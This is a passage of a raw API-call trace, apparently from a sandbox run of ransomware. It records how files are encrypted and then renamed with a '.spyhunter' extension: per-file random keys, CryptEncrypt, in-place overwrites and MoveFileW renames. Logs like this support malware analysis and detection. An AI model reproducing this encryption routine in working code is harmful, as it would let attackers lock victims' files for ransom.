returned 0x2c0000 [0168.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.813] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e678*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e678*=0x30) returned 1 [0168.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.847] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2") returned 53 [0168.847] StrStrW (lpFirst="GMT+2", lpSrch=".txt") returned 0x0 [0168.847] GetProcessHeap () returned 0x2c0000 [0168.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.847] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e63c*=0x1b, lpOverlapped=0x0) returned 1 [0168.847] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.848] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e63c*=0x1b, lpOverlapped=0x0) returned 1 [0168.848] GetProcessHeap () returned 0x2c0000 [0168.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.848] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.848] WriteFile (in: hFile=0xa0, lpBuffer=0x270e67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x270e67c*, lpNumberOfBytesWritten=0x270e63c*=0x4, lpOverlapped=0x0) returned 1 [0168.848] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e63c*=0x30, lpOverlapped=0x0) returned 1 [0168.848] CloseHandle (hObject=0xa0) returned 1 [0168.848] GetProcessHeap () returned 0x2c0000 [0168.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.848] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2.spyhunter") returned 63 [0168.848] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2.spyhunter")) returned 1 [0168.849] GetProcessHeap () returned 0x2c0000 [0168.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.849] GetProcessHeap () returned 0x2c0000 [0168.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.849] GetProcessHeap () returned 0x2c0000 [0168.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28060 | out: hHeap=0x2c0000) returned 1 [0168.849] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e680 | out: pbBuffer=0x270e680) returned 1 [0168.849] GetProcessHeap () returned 0x2c0000 [0168.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.849] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e678*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e678*=0x30) returned 1 [0168.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0168.864] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET") returned 47 [0168.864] StrStrW (lpFirst="CET", lpSrch=".txt") returned 0x0 [0168.864] GetProcessHeap () returned 0x2c0000 [0168.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0168.864] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e63c*=0x4a0, lpOverlapped=0x0) returned 1 [0168.975] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffb60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.975] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e63c*=0x4a0, lpOverlapped=0x0) returned 1 [0168.975] GetProcessHeap () returned 0x2c0000 [0168.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0168.975] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.975] WriteFile (in: hFile=0x178, lpBuffer=0x270e67c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x270e67c*, lpNumberOfBytesWritten=0x270e63c*=0x4, lpOverlapped=0x0) returned 1 [0168.976] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e63c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e63c*=0x30, lpOverlapped=0x0) returned 1 [0168.976] CloseHandle (hObject=0x178) returned 1 [0168.976] GetProcessHeap () returned 0x2c0000 [0168.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0168.976] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET.spyhunter") returned 57 [0168.976] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CET.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cet.spyhunter")) returned 1 [0168.977] GetProcessHeap () returned 0x2c0000 [0168.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0168.977] GetProcessHeap () returned 0x2c0000 [0168.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0168.977] GetProcessHeap () returned 0x2c0000 [0168.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d930 | out: hHeap=0x2c0000) returned 1 [0168.977] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e678 | out: pbBuffer=0x270e678) returned 1 [0168.977] GetProcessHeap () returned 0x2c0000 [0168.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0168.977] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e670*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e670*=0x30) returned 1 [0168.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.042] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik") returned 62 [0169.042] StrStrW (lpFirst="Reykjavik", lpSrch=".txt") returned 0x0 [0169.042] GetProcessHeap () returned 0x2c0000 [0169.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.042] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e634*=0x241, lpOverlapped=0x0) returned 1 [0169.043] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.043] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e634*=0x241, lpOverlapped=0x0) returned 1 [0169.043] GetProcessHeap () returned 0x2c0000 [0169.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.043] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.043] WriteFile (in: hFile=0x178, lpBuffer=0x270e674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x270e674*, lpNumberOfBytesWritten=0x270e634*=0x4, lpOverlapped=0x0) returned 1 [0169.043] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e634*=0x30, lpOverlapped=0x0) returned 1 [0169.043] CloseHandle (hObject=0x178) returned 1 [0169.043] GetProcessHeap () returned 0x2c0000 [0169.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.044] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik.spyhunter") returned 72 [0169.044] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Reykjavik.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\reykjavik.spyhunter")) returned 1 [0169.044] GetProcessHeap () returned 0x2c0000 [0169.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.044] GetProcessHeap () returned 0x2c0000 [0169.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.044] GetProcessHeap () returned 0x2c0000 [0169.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb3d0 | out: hHeap=0x2c0000) returned 1 [0169.044] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e678 | out: pbBuffer=0x270e678) returned 1 [0169.044] GetProcessHeap () returned 0x2c0000 [0169.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.045] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e670*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e670*=0x30) returned 1 [0169.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.055] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe") returned 58 [0169.055] StrStrW (lpFirst="Faroe", lpSrch=".txt") returned 0x0 [0169.055] GetProcessHeap () returned 0x2c0000 [0169.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.055] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e634*=0x3f8, lpOverlapped=0x0) returned 1 [0169.076] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffc08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.077] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3f8, lpNumberOfBytesWritten=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e634*=0x3f8, lpOverlapped=0x0) returned 1 [0169.077] GetProcessHeap () returned 0x2c0000 [0169.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.077] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.077] WriteFile (in: hFile=0xa0, lpBuffer=0x270e674*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x270e674*, lpNumberOfBytesWritten=0x270e634*=0x4, lpOverlapped=0x0) returned 1 [0169.077] WriteFile (in: hFile=0xa0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e634, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e634*=0x30, lpOverlapped=0x0) returned 1 [0169.077] CloseHandle (hObject=0xa0) returned 1 [0169.077] GetProcessHeap () returned 0x2c0000 [0169.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.077] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe.spyhunter") returned 68 [0169.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Faroe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\faroe.spyhunter")) returned 1 [0169.086] GetProcessHeap () returned 0x2c0000 [0169.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.086] GetProcessHeap () returned 0x2c0000 [0169.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.086] GetProcessHeap () returned 0x2c0000 [0169.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebdac0 | out: hHeap=0x2c0000) returned 1 [0169.086] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e670 | out: pbBuffer=0x270e670) returned 1 [0169.086] GetProcessHeap () returned 0x2c0000 [0169.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.086] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e668*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e668*=0x30) returned 1 [0169.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.090] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo") returned 54 [0169.090] StrStrW (lpFirst="Tokyo", lpSrch=".txt") returned 0x0 [0169.090] GetProcessHeap () returned 0x2c0000 [0169.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.090] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e62c*=0x7d, lpOverlapped=0x0) returned 1 [0169.090] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.091] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e62c*=0x7d, lpOverlapped=0x0) returned 1 [0169.091] GetProcessHeap () returned 0x2c0000 [0169.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.091] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.091] WriteFile (in: hFile=0x178, lpBuffer=0x270e66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x270e66c*, lpNumberOfBytesWritten=0x270e62c*=0x4, lpOverlapped=0x0) returned 1 [0169.091] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e62c*=0x30, lpOverlapped=0x0) returned 1 [0169.091] CloseHandle (hObject=0x178) returned 1 [0169.091] GetProcessHeap () returned 0x2c0000 [0169.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.091] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo.spyhunter") returned 64 [0169.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tokyo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tokyo.spyhunter")) returned 1 [0169.092] GetProcessHeap () returned 0x2c0000 [0169.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.092] GetProcessHeap () returned 0x2c0000 [0169.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.092] GetProcessHeap () returned 0x2c0000 [0169.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27c10 | out: hHeap=0x2c0000) returned 1 [0169.092] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e670 | out: pbBuffer=0x270e670) returned 1 [0169.092] GetProcessHeap () returned 0x2c0000 [0169.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.092] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e668*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e668*=0x30) returned 1 [0169.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.093] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran") returned 55 [0169.093] StrStrW (lpFirst="Tehran", lpSrch=".txt") returned 0x0 [0169.093] GetProcessHeap () returned 0x2c0000 [0169.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.093] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e62c*=0x37c, lpOverlapped=0x0) returned 1 [0169.094] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.095] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e62c*=0x37c, lpOverlapped=0x0) returned 1 [0169.095] GetProcessHeap () returned 0x2c0000 [0169.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.095] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.095] WriteFile (in: hFile=0x178, lpBuffer=0x270e66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x270e66c*, lpNumberOfBytesWritten=0x270e62c*=0x4, lpOverlapped=0x0) returned 1 [0169.095] WriteFile (in: hFile=0x178, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e62c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270e62c*=0x30, lpOverlapped=0x0) returned 1 [0169.095] CloseHandle (hObject=0x178) returned 1 [0169.095] GetProcessHeap () returned 0x2c0000 [0169.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.095] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran.spyhunter") returned 65 [0169.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tehran.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tehran.spyhunter")) returned 1 [0169.096] GetProcessHeap () returned 0x2c0000 [0169.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.096] GetProcessHeap () returned 0x2c0000 [0169.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0169.096] GetProcessHeap () returned 0x2c0000 [0169.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27b58 | out: hHeap=0x2c0000) returned 1 [0169.096] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e668 | out: pbBuffer=0x270e668) returned 1 [0169.096] GetProcessHeap () returned 0x2c0000 [0169.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0169.096] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270e660*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270e660*=0x30) returned 1 [0169.096] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tbilisi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0169.097] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tbilisi") returned 56 [0169.097] StrStrW (lpFirst="Tbilisi", lpSrch=".txt") returned 0x0 [0169.097] GetProcessHeap () returned 0x2c0000 [0169.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.097] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e624*=0x1d5, lpOverlapped=0x0) returned 1 [0169.098] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.098] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1d5, lpNumberOfBytesWritten=0x270e624, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e624*=0x1d5, lpOverlapped=0x0) returned 1 [0169.098] GetProcessHeap () returned 0x2c0000 [0169.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.098] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.098] WriteFile (in: hFile=0x178, lpBuffer=0x270e664*, 